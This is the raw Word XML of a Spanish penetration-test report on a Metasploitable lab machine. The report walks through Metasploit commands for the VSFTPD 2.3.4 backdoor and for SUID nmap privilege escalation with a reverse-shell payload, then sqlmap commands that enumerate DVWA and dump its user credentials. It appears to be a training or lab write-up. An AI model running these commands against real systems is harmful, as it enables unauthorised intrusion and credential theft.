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04B98" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75">
      <w:pPr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C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5780C755" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75">
      <w:pPr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C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026BDBCD" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75">
      <w:pPr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C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDC0BBB" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75">
      <w:pPr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C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2B75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C"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de Pruebas de Penetración - Máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D2B75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C"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ABAF0FB" w14:textId="77777777" w:rsid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50BBBB41" w14:textId="77777777" w:rsid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4D0B7FEF" w14:textId="77777777" w:rsid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4D37CD10" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRP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70C2C576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Fecha de Evaluación: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0</w:t>
      </w:r>
      <w:r w:rsidR="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>3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de </w:t>
      </w:r>
      <w:r w:rsidR="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Marzo</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E3A39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Objetivo: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192.168.1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC8E5F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Tipo de Evaluación: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Análisis de superficie de ataque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEC17B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Contexto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  <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 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n-US"/>
        </w:rPr>
        <w:t>Laboratorio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n-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Red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n-US"/>
        </w:rPr>
        <w:t>interna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73B165E5" w14:textId="77777777" w:rsid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9EF6B4" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRP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6B429D" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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E7582D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lastRenderedPageBreak/>
        <w:t>Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E99B5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Resumen del objetivo y alcance del ejercicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB62B0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Este informe documenta las pruebas de penetración realizadas contra el sistema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Metasploitable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(192.168.1.19) con el objetivo de identificar vulnerabilidades críticas y demostrar la capacidad de explotación para obtener acceso no autorizado y escalar privilegios. El alcance incluyó la identificación de servicios vulnerables, explotación de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backdoors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conocidos, pruebas de inyección SQL con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y escalada de privilegios hasta obtener acceso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root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completo al sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1295BAAE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>Metodología</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1527564B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Herramientas y técnicas utilizadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21262DC0" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Metasploit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Framework v6.4.97-dev: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 Para automatización de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exploits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y gestión de sesiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5E28F" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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SQLmap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Para detección y explotación automatizada de vulnerabilidades de inyección SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1708C" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Escaneo de vulnerabilidades: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Identificación de servicios y versiones vulnerables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54079A94" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Explotación manual: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 Manipulación de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backdoors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y escalada de privilegios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1F303" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Técnicas de </w:t>
      </w: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post-explotación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Mantenimiento de acceso y recolección de información sensible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25948C5D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>Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED99032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Detalles de las vulnerabilidades explotadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7DA1CA" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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1.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Vulnerabilidad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en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VSFTPD 2.3.4 (Backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB46AC4" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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CVE: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Asociado al backdoor de VSFTPD versión 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D70DDBC" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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Servicio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afectado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  <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> FTP (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n-US"/>
        </w:rPr>
        <w:t>puerto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n-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 21)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF74AF1" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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Impacto: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Ejecución remota de código como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root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0302CAA2" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Vector de ataque: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Usuario especial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trigger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"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username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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: )</w:t>
      </w:r>
      <w:proofErr w:type="gram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" que activa el backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D245C7B" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.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Vulnerabilidad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SUID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en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Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC93EF" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75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Binario afectado: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/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usr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/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bin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/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nmap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con bit SUID activado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C3F99C" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75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Impacto: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Escalada de privilegios local de usuario regular a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root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="634BC1F1" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75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Vector de ataque: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Abuso del modo interactivo de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nmap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para ejecutar comandos con privilegios elevados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C2685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Comandos y herramientas utilizadas para la explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263EB2B4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Fase 1: Identificación y explotación del backdoor VSFTPD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A7CEE" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75">
      <w:pPr>
        <w:spacing w:after="0" w:line="189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# Búsqueda del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exploit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en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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="007792A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search 234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640C7A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use exploit/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unix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/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3784F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</w:p>
    <w:p w14:paraId="32F3F6E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# Configuración del objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54533B4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set RHOST 192.168.1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18150FD2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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CB1A5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Opciones de configuración backdoor VSFTPD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107F649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Fase 2: Establecimiento de sesión inicial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980255D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[*] 192.168.1.19:21 - Banner: 220 (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vsFTPd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2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426284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[*] 192.168.1.19:21 - USER: 331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E39D7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[+] 192.168.1.19:21 - Backdoor service has been spawned, handling...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D5D4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[+] 192.168.1.19:21 - UID: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=0(root)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gid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=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52909F0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[*] Found shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11326DE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[*] Command shell session 1 opened (192.168.1.19:39951 -&gt; 192.168.1.19:6200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFB30D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Fase 3: Enumeración del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74DC0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# Comandos ejecutados en la sesión inicial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729DE5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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C44B69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whoami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#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Resultado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: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D447A" w14:textId="77777777" w:rsid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id      #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Resultado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=0(root)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gid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=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8C7B2" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="6B71ED8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</w:p>
    <w:p w14:paraId="0CB2232C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lastRenderedPageBreak/>
        <w:t>Sesión inicial obtenida vía backdoor VSFTPD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FBFB45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>Evidencias</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>recolectadas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65E346F4" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Sistema </w:t>
      </w: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operativo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  <w:r w:rsidRPr="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux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n-US"/>
        </w:rPr>
        <w:t>metasploitable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n-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6.24-16-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25E404" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Arquitectura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  <w:r w:rsidRPr="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A96470" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Hostname:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 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n-US"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="187F079D" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Usuario comprometido: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root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(acceso completo al sistema)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53CD3A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>Escalada de Privilegios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F516F2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Técnicas utilizadas y resultados obtenidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767DF277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1. Identificación de binarios SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CBB40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# Comprobación de permisos SUID en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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19C6EAB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ls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-la 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usr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bin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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F27CE8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Resultado: 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rwsr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xr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-x 1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root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root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780676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Apr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8 2008 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usr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bin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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="352A7BD7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2. Explotación de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Nmap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con bit SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DDB18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# Uso del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exploit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setuid_nmap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de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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08EFB03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search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setuid_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E487F6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use exploit/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unix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/local/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setuid_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E4C868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set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2E46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set LHOST 192.168.1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91362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set LPORT 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D693B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set PAYLOAD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cmd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unix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/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED936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run -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C6135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Configuración de vulnerabilidad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setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="386A0E17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Cambio de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payload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para realizar un reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB480B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Ejecución de vulnerabilidad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setuid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de forma exitosa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7B6F8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3. Resultado de la escalada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A33344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lastRenderedPageBreak/>
        <w:t xml:space="preserve">[*]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Command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shell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session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2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opened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(192.168.1.19:4444 -&gt; 192.168.1.19:49879)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969DFD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whoami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 #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Resultado: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root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DBBFBBD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id      # Resultado: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uid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=0(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root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)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gid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=0(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root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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB55EF3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4. Verificación de privilegios completos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C08493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if [ "$(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whoami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)" = "root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" ]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; then echo "¡SOY ROOT!"; fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDEB5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Resultado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: ¡SOY ROOT!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A6E6E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 xml:space="preserve">Pruebas con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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 xml:space="preserve"> (Inyección SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1B352C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 xml:space="preserve">Introducción a </w:t>
      </w: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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AD3B034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es una herramienta de código abierto diseñada para automatizar el proceso de detección y explotación de vulnerabilidades de inyección SQL. En esta evaluación, se utilizó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contra la aplicación web vulnerable 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Damn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Vulnerable Web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Application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(DVWA)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desplegada en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Metasploitable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, específicamente en el módulo de inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B7EDA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Identificación del objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE415F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Escaneo inicial de servicios web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E9AA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# Escaneo de puertos web con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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57FEC00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nmap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sV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-p 80,8080 192.168.1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A509E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Resultados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p w14:paraId="0393A97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PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8516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80/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tcp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open  http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 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7D83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8080/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tcp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open  http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 Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEDF910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Confirmación de aplicación vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678C129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Se identificó que la aplicación DVWA (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Damn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Vulnerable Web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Application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) está disponible en </w:t>
      </w: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http://192.168.1.19/dvwa/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. El módulo "SQL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Injection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" permite pruebas controladas de inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119746BF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Configuración de </w:t>
      </w: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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7381C2CF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Comando básico de detección de vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B6C9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3B21E48D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1E49CD3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--batch \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10518DB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--level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6992C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Parámetros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utilizados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171"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="56A3DE28" w14:textId="77777777" w:rsidTr="000D2B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EF1D8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Parámetro</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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28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Descripción</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="4CA90C8A" w14:textId="77777777" w:rsidTr="000D2B7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7CF2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-u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C36A4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URL objetivo con parámetro vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="050FBFBC" w14:textId="77777777" w:rsidTr="000D2B7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F79B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--cookie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1B73E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Cookie de sesión autenticada (DVWA requiere autenticación)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="6A6A5802" w14:textId="77777777" w:rsidTr="000D2B7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B4C9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--batch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06A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Modo automático (sin interacción del usuario)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="762A6B0D" w14:textId="77777777" w:rsidTr="000D2B7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F4408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--level = 3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B1B0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Nivel de pruebas (mayor profundidad)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5459C1D1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Resultado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de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detección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p w14:paraId="126D3E9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testing connection to the target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04066A7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[INFO] checking if the target is protected by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some kind of WAF/IPS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="052F21A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testing if the target URL is stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A2BD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testing if GET parameter 'id' is dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1288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GET parameter 'id' appears to be dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DCB74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heuristic (basic) test shows that GET parameter 'id' might be injectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F2E5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testing for SQL injection on GET parameter 'id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A510DC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[INFO] testing 'AND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boolean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-based blind - WHERE or HAVING clause'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A6D2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[INFO] GET parameter 'id' is 'AND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boolean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-based blind - WHERE or HAVING clause' injectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538A2D2F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testing 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F450D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GET parameter 'id' is 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF4AF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testing 'MySQL UNION query (NULL) - 1 to 20 columns'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B920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lastRenderedPageBreak/>
        <w:t>[INFO] target is vulnerable to 'MySQL UNION query (NULL) - 1 to 20 columns'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D645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web server operating system: Linux Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F42F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web application technology: PHP 5.2.4, Apache 2.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A598E2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[INFO] back-end DBMS: MySQL &gt;= 5.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AFF28C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Confirmación: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La aplicación es vulnerable a inyección SQL con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backend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MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8A00D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Enumeración de bases de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D20FF98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Listado de bases de datos existentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FA412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5CA1AA2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4109EDE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dbs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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F90FF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--batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7188D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Resultado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p w14:paraId="29A5C98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available databases [5]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583197AF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[*]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</w:p>
    <w:p w14:paraId="01950BA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[*]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information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DEC37B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[*]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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A23517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[*]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performance_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37F8EE3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[*] test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D77F6E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Selección y enumeración de la base de datos DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D409BC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12A585C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7308E9C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-D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dvwa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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD0E4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--tables \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A4A7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--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batch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A743F8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Tablas encontradas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7564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Database: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</w:p>
    <w:p w14:paraId="11E63385" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75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guestboo</w:t>
      </w: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k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753389A" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75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user</w:t>
      </w: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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF4A21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lastRenderedPageBreak/>
        <w:t>Extracción de datos sensibles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BBBA32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Enumeración de columnas en la tabla "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users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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2BA5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4E13CC4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6890F232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-D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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA854A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-T users \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4B1D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--columns \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE71B6F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--batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14501B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Columnas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identificadas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p w14:paraId="3252136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Database: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</w:p>
    <w:p w14:paraId="11BEDFA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Table: users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629630CD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[8 columns]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB185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+--------------+-----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E41A2B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| Column       | Type            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070C098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+--------------+-----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6E2C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user_id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  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int(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6)          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6B87F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first_name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varchar(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15)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0AFA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last_name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varchar(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15)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467ECF5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user        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varchar(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15)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E50F4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password    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varchar(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32)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3386F18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avatar      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varchar(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70)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEBA0E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last_login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  | timestamp       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87A85D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failed_login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| </w:t>
      </w:r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int(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3)          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52BC5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+--------------+-----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50105D86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Extracción de credenciales de usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0CA8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30C75A2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6AD9E58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-D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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44474CB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-T users \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E565527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-C </w:t>
      </w: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user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DA91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--dump \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D7F66" w14:textId="77777777" w:rsid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--batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD38E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</w:p>
